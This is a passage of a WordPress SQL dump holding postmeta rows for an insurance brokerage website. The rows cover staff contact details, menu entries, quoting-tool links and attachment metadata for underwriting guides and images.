Director'),(412,222,'client_email','Cheskel@empireins.com'),(413,222,'client_ext','207'),(414,223,'_edit_lock','1446909330:1'),(415,223,'_edit_last','1'),(416,223,'client_position','Please email'),(417,223,'client_email','commission@empireins.com'),(424,225,'_edit_lock','1446909290:1'),(425,225,'_edit_last','1'),(426,225,'client_position','Controller'),(428,225,'client_ext','202'),(429,226,'_edit_lock','1449863916:1'),(430,226,'_edit_last','1'),(431,226,'client_position','President and CEO'),(432,226,'client_email','David@empireins.com'),(433,226,'client_ext','204'),(437,230,'_edit_last','1'),(438,230,'_wp_page_template','default'),(439,230,'_edit_lock','1457455497:1'),(449,234,'_menu_item_type','post_type'),(450,234,'_menu_item_menu_item_parent','0'),(451,234,'_menu_item_object_id','185'),(452,234,'_menu_item_object','page'),(453,234,'_menu_item_target',''),(454,234,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(455,234,'_menu_item_xfn',''),(456,234,'_menu_item_url',''),(459,238,'_edit_lock','1451389747:1'),(460,238,'_edit_last','1'),(471,238,'songs','a:2:{i:0;a:2:{s:5:\"title\";s:3:\"dfg\";s:5:\"track\";s:3:\"dfg\";}i:2;a:2:{s:5:\"title\";s:2:\"df\";s:5:\"track\";s:5:\"dgsdg\";}}'),(472,238,'items','a:2:{i:0;a:3:{s:5:\"title\";s:13:\"Life Products\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:45:\"http://www.empireins.com/life-product-search/\";}i:1;a:3:{s:5:\"title\";s:16:\"Annuity Products\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:48:\"http://www.empireins.com/annuity-product-search/\";}}'),(473,253,'_edit_last','1'),(474,253,'items','a:2:{i:0;a:4:{s:5:\"title\";s:10:\"WinFlexWeb\";s:3:\"img\";s:60:\"http://www.empireins.com/wp-content/uploads/2014/11/ebix.png\";s:3:\"lnk\";s:25:\"http://www.winflexweb.com\";s:6:\"newtab\";s:2:\"on\";}i:1;a:3:{s:5:\"title\";s:11:\"Term Quotes\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:37:\"http://www.empireins.com/term-quotes/\";}}'),(475,253,'_edit_lock','1452104372:1'),(476,254,'_wp_attached_file','2014/11/1.png'),(477,254,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:51;s:6:\"height\";i:51;s:4:\"file\";s:13:\"2014/11/1.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(479,238,'_thumbnail_id','254'),(480,255,'_wp_attached_file','2014/11/2.png'),(481,255,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:51;s:6:\"height\";i:51;s:4:\"file\";s:13:\"2014/11/2.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(482,256,'_wp_attached_file','2014/11/3.png'),(483,256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:51;s:6:\"height\";i:51;s:4:\"file\";s:13:\"2014/11/3.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(484,257,'_wp_attached_file','2014/11/4.png'),(485,257,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:51;s:6:\"height\";i:51;s:4:\"file\";s:13:\"2014/11/4.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(486,258,'_wp_attached_file','2014/11/5.png'),(487,258,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:51;s:6:\"height\";i:51;s:4:\"file\";s:13:\"2014/11/5.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(488,259,'_wp_attached_file','2014/11/6.png'),(489,259,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:51;s:6:\"height\";i:51;s:4:\"file\";s:13:\"2014/11/6.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(490,260,'_wp_attached_file','2014/11/ebix.png'),(491,260,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:154;s:6:\"height\";i:41;s:4:\"file\";s:16:\"2014/11/ebix.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ebix-150x41.png\";s:5:\"width\";i:150;s:6:\"height\";i:41;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:15:\"ebix-115x30.png\";s:5:\"width\";i:115;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(492,261,'_wp_attached_file','2014/11/ipipeline.png'),(493,261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:157;s:6:\"height\";i:22;s:4:\"file\";s:21:\"2014/11/ipipeline.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"ipipeline-150x22.png\";s:5:\"width\";i:150;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:20:\"ipipeline-115x16.png\";s:5:\"width\";i:115;s:6:\"height\";i:16;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(494,262,'_wp_attached_file','2014/11/right.png'),(495,262,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:54;s:6:\"height\";i:58;s:4:\"file\";s:17:\"2014/11/right.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),(496,261,'_edit_lock','1437837938:1'),(497,277,'_edit_lock','1437836308:1'),(498,277,'_edit_last','1'),(499,280,'_wp_attached_file','2015/02/LTCNewslink_NYP_Disc.pdf'),(500,283,'_edit_lock','1437836377:1'),(501,283,'_edit_last','1'),(502,284,'_wp_attached_file','2015/02/AGLC103795_REV0215_SAT_RatedTerm_FILLX.pdf'),(503,285,'_wp_attached_file','2015/02/AGLC106514REV0215_SAT_RateFlyer_FILLX.pdf'),(504,286,'_wp_attached_file','2015/02/AGLC104824_REV0215_SaT_RepriceComparison_2FILLX.pdf'),(505,288,'_edit_lock','1452079819:1'),(506,288,'_edit_last','1'),(507,290,'_edit_lock','1437836439:1'),(508,290,'_edit_last','1'),(515,303,'_edit_lock','1452113669:1'),(516,303,'_edit_last','1'),(517,303,'_wp_page_template','default'),(518,303,'_wpmem_block','1'),(519,306,'_edit_lock','1457040411:1'),(520,306,'_edit_last','1'),(521,306,'_wp_page_template','default'),(522,306,'_wpmem_block','1'),(523,309,'_edit_lock','1452533450:1'),(524,309,'_edit_last','1'),(525,309,'_wp_page_template','page-front-wo-sidebar.php'),(526,309,'_wpmem_block','1'),(527,311,'_edit_lock','1452533718:1'),(528,311,'_edit_last','1'),(529,311,'_wp_page_template','page-front-wo-sidebar.php'),(530,311,'_wpmem_block','1'),(531,313,'_edit_lock','1447186398:1'),(532,313,'_edit_last','1'),(533,313,'_wp_page_template','default'),(534,313,'_wpmem_block','1'),(535,315,'_edit_lock','1446909005:1'),(536,315,'_edit_last','1'),(537,315,'_wp_page_template','default'),(538,317,'_edit_lock','1446908858:1'),(539,317,'_edit_last','1'),(540,317,'_wp_page_template','default'),(541,319,'_edit_lock','1452551141:1'),(542,319,'_edit_last','1'),(543,319,'_wp_page_template','default'),(590,336,'_menu_item_type','post_type'),(591,336,'_menu_item_menu_item_parent','0'),(592,336,'_menu_item_object_id','306'),(593,336,'_menu_item_object','page'),(594,336,'_menu_item_target',''),(595,336,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(596,336,'_menu_item_xfn',''),(597,336,'_menu_item_url',''),(600,343,'_edit_lock','1451390084:1'),(601,343,'_edit_last','1'),(602,343,'items','a:3:{i:1;a:3:{s:5:\"title\";s:19:\"Underwriting Search\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:45:\"http://www.empireins.com/underwriting-search/\";}i:2;a:3:{s:5:\"title\";s:25:\"Underwriting Cheat Sheets\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:51:\"http://www.empireins.com/underwriting-cheat-sheets/\";}i:3;a:3:{s:5:\"title\";s:25:\"Field Underwriting Guides\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:59:\"http://www.empireins.com/carrier-field-underwriting-guides/\";}}'),(603,343,'_thumbnail_id','254'),(604,344,'_edit_lock','1452104376:1'),(605,344,'_edit_last','1'),(606,344,'items','a:2:{i:0;a:3:{s:5:\"title\";s:12:\"Forms Search\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:31:\"http://www.empireins.com/forms/\";}i:1;a:3:{s:5:\"title\";s:3:\"iGo\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:29:\"http://www.empireins.com/igo/\";}}'),(608,345,'_edit_lock','1451388057:1'),(609,345,'_edit_last','1'),(610,345,'_thumbnail_id','259'),(611,345,'items','a:1:{i:1;a:4:{s:5:\"title\";s:11:\"Case Status\";s:3:\"img\";s:65:\"http://www.empireins.com/wp-content/uploads/2014/11/ipipeline.png\";s:3:\"lnk\";s:37:\"http://www.empireins.com/case-status/\";s:6:\"newtab\";s:2:\"on\";}}'),(612,347,'_edit_lock','1448313887:1'),(613,347,'_edit_last','1'),(614,347,'_wp_page_template','default'),(615,41,'_edit_lock','1439397417:1'),(618,225,'client_email','GittyBraver@empireins.com'),(620,362,'_wp_attached_file','2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf'),(621,363,'_wp_attached_file','2015/11/South-Africa-PRODUCER.pdf'),(622,364,'_wp_attached_file','2015/11/Term-Summit-2016.pdf'),(624,344,'_thumbnail_id','256'),(625,253,'_thumbnail_id','255'),(634,379,'_edit_lock','1457379576:1'),(635,379,'_edit_last','1'),(636,379,'_wp_page_template','default'),(637,383,'_edit_lock','1449677115:1'),(638,383,'_edit_last','1'),(639,383,'_wp_page_template','default'),(640,389,'_wp_attached_file','2015/11/Aviation-Cheat-Sheet.pdf'),(641,390,'_wp_attached_file','2015/11/Avocation-Exclusion-Cheat-Sheet.pdf'),(642,391,'_wp_attached_file','2015/11/Bankruptcy-History-Cheat-Sheet.pdf'),(643,392,'_wp_attached_file','2015/11/Blood-Pressure-Cheat-Sheet.pdf'),(644,393,'_wp_attached_file','2015/11/Cancer-History-Cheat-Sheet.pdf'),(645,394,'_wp_attached_file','2015/11/Cholesterol-Cheat-Sheet.pdf'),(646,395,'_wp_attached_file','2015/11/Driving-History-Cheat-Sheet.pdf'),(647,396,'_wp_attached_file','2015/11/Family-History-Cheat-Sheet.pdf'),(648,397,'_wp_attached_file','2015/11/Marijuana-Usage-Cheat-Sheet.pdf'),(649,398,'_wp_attached_file','2015/11/Tobacco-Usage-Cheat-Sheet.pdf'),(650,399,'_wp_attached_file','2015/11/Underwriting-Programs-Cheat-Sheet.pdf'),(651,383,'_wpmem_block','1'),(652,402,'_wp_attached_file','2015/11/ACC-Field-Underwriting-Guide.pdf'),(653,403,'_wp_attached_file','2015/11/AXA-Field-Underwriting-Guide.pdf'),(654,404,'_wp_attached_file','2015/11/LFD-Field-Underwriting-Guide.pdf'),(655,405,'_wp_attached_file','2015/11/PRN-Field-Underwriting-Guide.pdf'),(656,406,'_wp_attached_file','2015/11/PRO-Field-Underwriting-Guide.pdf'),(657,407,'_wp_attached_file','2015/11/Sym-Field-Underwriting-Guide.pdf'),(658,408,'_wp_attached_file','2015/11/TA-Field-Underwriting-Guide.pdf'),(659,409,'_wp_attached_file','2015/11/VYA-Field-Underwriting-Guide.pdf'),(660,410,'_wp_attached_file','2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf'),(661,411,'_wp_attached_file','2015/11/AIG-UW-Guide-06-08-2015.pdf'),(662,412,'_wp_attached_file','2015/11/JH-Field-Underwriting-Guide.pdf'),(663,413,'_wp_attached_file','2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf'),(664,414,'_wp_attached_file','2015/11/MoneyGuard-UW-Resources.pdf'),(665,379,'_wpmem_block','1'),(668,423,'_wp_attached_file','2014/04/MM-Field-Underwriting-Guide.pdf'),(669,425,'_wp_attached_file','2014/04/Pru-Field-Underwriting-Guide.pdf'),(670,427,'_wp_attached_file','2014/04/PM-Field-Underwriting-Guide.pdf'),(671,429,'_wp_attached_file','2014/04/LG-Field-Underwriting-Guide.pdf'),(672,431,'_wp_attached_file','2014/04/NYL-Field-Underwriting-Guide.pdf'),(676,439,'_wp_attached_file','2014/04/ANICO-2016_conference.pdf'),(677,439,'_edit_lock','1449780414:1'),(678,442,'_wp_attached_file','2014/04/slide1.jpg'),(679,442,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:919;s:6:\"height\";i:319;s:4:\"file\";s:18:\"2014/04/slide1.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"slide1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"slide1-300x104.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"slide1-238x83.jpg\";s:5:\"width\";i:238;s:6:\"height\";i:83;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:17:\"slide1-115x40.jpg\";s:5:\"width\";i:115;s:6:\"height\";i:40;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:17:\"slide1-185x64.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:64;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"blog\";a:4:{s:4:\"file\";s:17:\"slide1-175x61.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:61;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"single-page\";a:4:{s:4:\"file\";s:18:\"slide1-587x204.jpg\";s:5:\"width\";i:587;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:17:\"slide1-210x73.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:73;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:17:\"slide1-187x65.jpg\";s:5:\"width\";i:187;s:6:\"height\";i:65;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(680,443,'_wp_attached_file','2014/04/Untitled-2.jpg'),(681,443,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:185;s:6:\"height\";i:123;s:4:\"file\";s:22:\"2014/04/Untitled-2.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:21:\"Untitled-2-115x76.jpg\";s:5:\"width\";i:115;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:22:\"Untitled-2-185x123.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"blog\";a:4:{s:4:\"file\";s:22:\"Untitled-2-175x116.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:21:\"Untitled-2-135x90.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:21:\"Untitled-2-120x80.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(683,444,'_wp_attached_file','2014/04/box2.jpg'),(684,444,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:185;s:6:\"height\";i:123;s:4:\"file\";s:16:\"2014/04/box2.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"box2-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:15:\"box2-115x76.jpg\";s:5:\"width\";i:115;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:16:\"box2-185x123.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"blog\";a:4:{s:4:\"file\";s:16:\"box2-175x116.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:15:\"box2-135x90.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:15:\"box2-120x80.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(685,46,'_thumbnail_id','444'),(686,445,'_wp_attached_file','2014/04/box3.jpg'),(687,445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:185;s:6:\"height\";i:123;s:4:\"file\";s:16:\"2014/04/box3.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"box3-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:15:\"box3-115x76.jpg\";s:5:\"width\";i:115;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:16:\"box3-185x123.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"blog\";a:4:{s:4:\"file\";s:16:\"box3-175x116.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:15:\"box3-135x90.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:15:\"box3-120x80.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(688,47,'_thumbnail_id','445'),(689,446,'_wp_attached_file','2014/04/box4.jpg'),(690,446,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:185;s:6:\"height\";i:123;s:4:\"file\";s:16:\"2014/04/box4.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"box4-150x123.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:15:\"box4-115x76.jpg\";s:5:\"width\";i:115;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:16:\"box4-185x123.jpg\";s:5:\"width\";i:185;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"blog\";a:4:{s:4:\"file\";s:16:\"box4-175x116.jpg\";s:5:\"width\";i:175;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:15:\"box4-135x90.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:90;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:15:\"box4-120x80.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(692,447,'_wp_attached_file','2014/04/Guardian-UW-Guide.pdf'),(693,449,'_wp_attached_file','2014/04/MN-Life-2015-Underwriting-Packet-.pdf'),(694,45,'the_lnk','/case-status/'),(695,46,'the_lnk','/forms/'),(696,47,'the_lnk','/igo/'),(697,39,'the_lnk','/term-quotes/'),(706,452,'_wp_attached_file','2014/04/slide-5.png'),(707,452,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:910;s:6:\"height\";i:313;s:4:\"file\";s:19:\"2014/04/slide-5.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"slide-5-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"slide-5-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"slide-5-238x82.png\";s:5:\"width\";i:238;s:6:\"height\";i:82;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:18:\"slide-5-115x40.png\";s:5:\"width\";i:115;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:18:\"slide-5-185x64.png\";s:5:\"width\";i:185;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"blog\";a:4:{s:4:\"file\";s:18:\"slide-5-175x60.png\";s:5:\"width\";i:175;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"single-page\";a:4:{s:4:\"file\";s:19:\"slide-5-587x202.png\";s:5:\"width\";i:587;s:6:\"height\";i:202;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"sidebar_latest\";a:4:{s:4:\"file\";s:18:\"slide-5-210x72.png\";s:5:\"width\";i:210;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"sidebar_featured\";a:4:{s:4:\"file\";s:18:\"slide-5-187x64.png\";s:5:\"width\";i:187;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:11:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";s:11:\"orientation\";i:0;}}'),(708,454,'_wp_attached_file','2014/04/eib-slider-2.png'),(709,454,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:910;s:6:\"height\";i:313;s:4:\"file\";s:24:\"2014/04/eib-slider-2.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"eib-slider-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"eib-slider-2-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:23:\"eib-slider-2-238x82.png\";s:5:\"width\";i:238;s:6:\"height\";i:82;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"footer_latest\";a:4:{s:4:\"file\";s:23:\"eib-slider-2-115x40.png\";s:5:\"width\";i:115;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"featured_tools\";a:4:{s:4:\"file\";s:23:\"eib-slider-2-185x64.png\";s:5:\"width\";i:185;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"blog\";a:4:{s:4:\"file\";s:23:\"eib-slider-2-175x60.png\";s